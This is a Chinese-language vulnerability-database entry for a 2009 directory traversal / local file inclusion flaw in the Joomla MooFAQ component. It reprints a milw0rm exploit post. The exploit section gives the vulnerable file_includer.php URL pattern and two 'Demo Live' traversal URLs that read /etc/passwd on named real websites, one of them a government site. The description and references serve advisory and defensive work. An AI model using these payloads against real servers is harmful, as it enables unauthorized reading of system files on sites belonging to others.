Ideal MooFAQ 'file_includer.php'目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117925 漏洞类型 路径遍历
发布时间 2009-06-08 更新时间 2009-06-24
CVE编号 CVE-2009-2015 CNNVD-ID CNNVD-200906-126
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8898
https://cxsecurity.com/issue/WLB-2009060125
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-126
|漏洞详情
Joomla!IdealMooFAQ(com_moofaq)组件1.0版本的includes/file_includer.php中存在目录遍历漏洞。远程攻击者可以借助文件参数中的一个..,读取任意文件。
|漏洞EXP
----------------------------------------------------------------------
Joomla Component MooFAQ Local File Inclusion Vulnerability
----------------------------------------------------------------------

 ###################################################
 [+] Author        :  Chip D3 Bi0s
 [+] Email         :  chipdebios[alt+64]gmail.com
 [+] Vulnerability :  LFI
 ###################################################

________________________________________________________

Example:

http://localHost/path/components/com_moofaq/includes/file_includer.php?gzip=0&file=[LFI]


Demo Live (1):
http://www.paginaswebhonduras.com/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd

Demo Live (2):
http://www.uers.gov.do/components/com_moofaq/includes/file_includer.php?gzip=0&file=/etc/passwd

++++++++++++++++++++++++++++++++
[!] Produced in South America
--------------------------------


<productName>FAQ Component using mooTools</productName>
<creationDate>20 July 2007</creationDate>
<version>1.0</version>
<joomlaVersion>1.0.13</joomlaVersion>
<author>Douglas Machado</author>
<authorName>Douglas Machado</authorName>
<authorEmail>falecom@focalizaisso.com.br</authorEmail>
<authorUrl>opensource.focalizaisso.com.br</authorUrl>
<productPicture>config.png</productPicture>
<productUrl>http://opensource.focalizaisso.com.br/</productUrl>
<setupUrl>http://opensource.focalizaisso.com.br/</setupUrl>

# milw0rm.com [2009-06-08]
|参考资料

来源:VUPEN
名称:ADV-2009-1530
链接:http://www.vupen.com/english/advisories/2009/1530
来源:BID
名称:35259
链接:http://www.securityfocus.com/bid/35259
来源:MILW0RM
名称:8898
链接:http://www.milw0rm.com/exploits/8898
来源:SECUNIA
名称:35370
链接:http://secunia.com/advisories/35370